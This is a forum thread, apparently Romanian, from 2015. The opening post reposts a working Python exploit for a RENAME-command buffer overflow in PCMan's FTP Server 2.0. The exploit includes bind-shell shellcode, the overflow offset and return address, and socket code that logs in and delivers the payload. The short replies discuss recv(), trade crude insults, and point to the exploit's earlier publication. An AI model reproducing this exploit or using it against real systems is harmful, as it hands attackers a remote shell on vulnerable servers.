Anonym13 Posted September 1, 2015 Report Share Posted September 1, 2015 #!/usr/bin/python# Exploit Title: PCMan's FTP Server v2.0 - RENAME command remote buffer overflow# Date: 29 Aug 2015# Exploit Author: Koby# Vendor Homepage: http://pcman.openfoundry.org/# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z# Version: 2.0.7# Tested on: Windows XP SP3import socketimport sys# msfvenom -p windows/shell_bind_tcp lhost=192.168.1.130 lport=4444 -b '\x00\x0a\x0b\x27\x36\xce\xc1\x04\x14\x3a\x44\xe0\x42\xa9\x0d' -f ruby# Payload size: 352 bytesshellcode = ("\x31\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76""\x0e\xb3\x93\xd2\x17\x83\xee\xfc\xe2\xf4\x4f\x7b\x50\x17""\xb3\x93\xb2\x9e\x56\xa2\x12\x73\x38\xc3\xe2\x9c\xe1\x9f""\x59\x45\xa7\x18\xa0\x3f\xbc\x24\x98\x31\x82\x6c\x7e\x2b""\xd2\xef\xd0\x3b\x93\x52\x1d\x1a\xb2\x54\x30\xe5\xe1\xc4""\x59\x45\xa3\x18\x98\x2b\x38\xdf\xc3\x6f\x50\xdb\xd3\xc6""\xe2\x18\x8b\x37\xb2\x40\x59\x5e\xab\x70\xe8\x5e\x38\xa7""\x59\x16\x65\xa2\x2d\xbb\x72\x5c\xdf\x16\x74\xab\x32\x62""\x45\x90\xaf\xef\x88\xee\xf6\x62\x57\xcb\x59\x4f\x97\x92""\x01\x71\x38\x9f\x99\x9c\xeb\x8f\xd3\xc4\x38\x97\x59\x16""\x63\x1a\x96\x33\x97\xc8\x89\x76\xea\xc9\x83\xe8\x53\xcc""\x8d\x4d\x38\x81\x39\x9a\xee\xfb\xe1\x25\xb3\x93\xba\x60""\xc0\xa1\x8d\x43\xdb\xdf\xa5\x31\xb4\x6c\x07\xaf\x23\x92""\xd2\x17\x9a\x57\x86\x47\xdb\xba\x52\x7c\xb3\x6c\x07\x7d""\xbb\xca\x82\xf5\x4e\xd3\x82\x57\xe3\xfb\x38\x18\x6c\x73""\x2d\xc2\x24\xfb\xd0\x17\xa2\xcf\x5b\xf1\xd9\x83\x84\x40""\xdb\x51\x09\x20\xd4\x6c\x07\x40\xdb\x24\x3b\x2f\x4c\x6c""\x07\x40\xdb\xe7\x3e\x2c\x52\x6c\x07\x40\x24\xfb\xa7\x79""\xfe\xf2\x2d\xc2\xdb\xf0\xbf\x73\xb3\x1a\x31\x40\xe4\xc4""\xe3\xe1\xd9\x81\x8b\x41\x51\x6e\xb4\xd0\xf7\xb7\xee\x16""\xb2\x1e\x96\x33\xa3\x55\xd2\x53\xe7\xc3\x84\x41\xe5\xd5""\x84\x59\xe5\xc5\x81\x41\xdb\xea\x1e\x28\x35\x6c\x07\x9e""\x53\xdd\x84\x51\x4c\xa3\xba\x1f\x34\x8e\xb2\xe8\x66\x28""\x22\xa2\x11\xc5\xba\xb1\x26\x2e\x4f\xe8\x66\xaf\xd4\x6b""\xb9\x13\x29\xf7\xc6\x96\x69\x50\xa0\xe1\xbd\x7d\xb3\xc0""\x2d\xc2")# buffer overflow was found by fuzzing with ftp_pre_post (metasploit)# bad data is a string of 2004 "A" characters to get to a EIP overwrite# followed by the JMP ESP instruction 0x7cb48eed in SYSTEM32.dllbaddata = '\x41'*2004+'\xed\x8e\xb4\x7c'# login to ftp followed by sending the bad data & payloads=socket.socket(socket.AF_INET,socket.SOCK_STREAM)connect=s.connect(('192.168.1.135',21))s.recv(1024)s.send('USER anonymous\r\n')s.recv(1024)s.send('PASS anonymous\r\n')s.recv(1024)s.send('RENAME ' + baddata +'\x90'*50+ shellcode+ '\r\n')s.close() Quote Link to comment Share on other sites More sharing options...
hades Posted September 1, 2015 Report Share Posted September 1, 2015 De ce s.recv(1024) ?Nu se poate apela recv() fara un numar explicit? Quote Link to comment Share on other sites More sharing options...
Active Members MrGrj Posted September 1, 2015 Active Members Report Share Posted September 1, 2015 s.recv(1024) citeste cel mult 1024 bytes. Quote Link to comment Share on other sites More sharing options...
hades Posted September 1, 2015 Report Share Posted September 1, 2015 @MrGrj: Nu era pentru tine intrebarea. Quote Link to comment Share on other sites More sharing options...
Anonym13 Posted September 1, 2015 Author Report Share Posted September 1, 2015 @MrGrj: Nu era pentru tine intrebarea. i don't know.domn' profesor. Quote Link to comment Share on other sites More sharing options...
Lu.ex Posted September 1, 2015 Report Share Posted September 1, 2015 @Anonym13, mananci cacat cu lingurita.https://www.exploit-db.com/exploits/26471/ Quote Link to comment Share on other sites More sharing options...
Anonym13 Posted September 1, 2015 Author Report Share Posted September 1, 2015 @Anonym13, mananci cacat cu lingurita.https://www.exploit-db.com/exploits/26471/Exploit Author: Koby , muie cu cacat Quote Link to comment Share on other sites More sharing options...